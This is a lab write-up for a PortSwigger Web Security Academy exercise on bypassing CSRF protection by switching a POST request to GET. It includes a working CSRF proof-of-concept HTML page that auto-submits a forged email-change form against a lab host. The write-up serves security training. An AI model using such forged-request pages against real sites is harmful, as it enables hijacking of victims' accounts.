Lab: CSRF where token validation depends on request method

tags: Portswigger Web Security Academy Web

• Description: This lab’s email change functionality is vulnerable to CSRF. It attempts to block CSRF attacks, but only applies defenses to certain types of requests.
• Goal: To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer’s email address. You can log in to your own account using the following credentials: wiener:peter

Recon

1. Login and update email to trace the package Like the previous lab, we first login to the website and update the email. At the same time, we can trace update email package shown below: We can notice that the carried data including csrf_token

2. According to 从0到1完全掌握 CSRF and CSDN write up :::info We know that using some technique can bypass this protection $\to$ 1. **Delete `csrf_token` data** 2. **change `POST` method to `GET` method**

   In this lab, we use the 2nd method to bypass CSRF ::: You can see that the response status is 302 which means it’s a good way to forge a CSRF package

Exp - Change POST to GET to bypass CSRF

Follow the self-created package at previous lab Exploit Payload:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
 
    <form action="https://0a9700ef04043a66801b0d0e00d10084.web-security-academy.net/my-account/change-email?email=bernie6401%40gmail.com" method="GET">
      <input type="hidden" name="email" value="danger&#64;gmail&#46;com" />
    </form>
    <script>
          document.forms[0].submit();
    </script>
  </body>
</html>

:::spoiler Success Screenshot :::

Reference

从0到1完全掌握 CSRF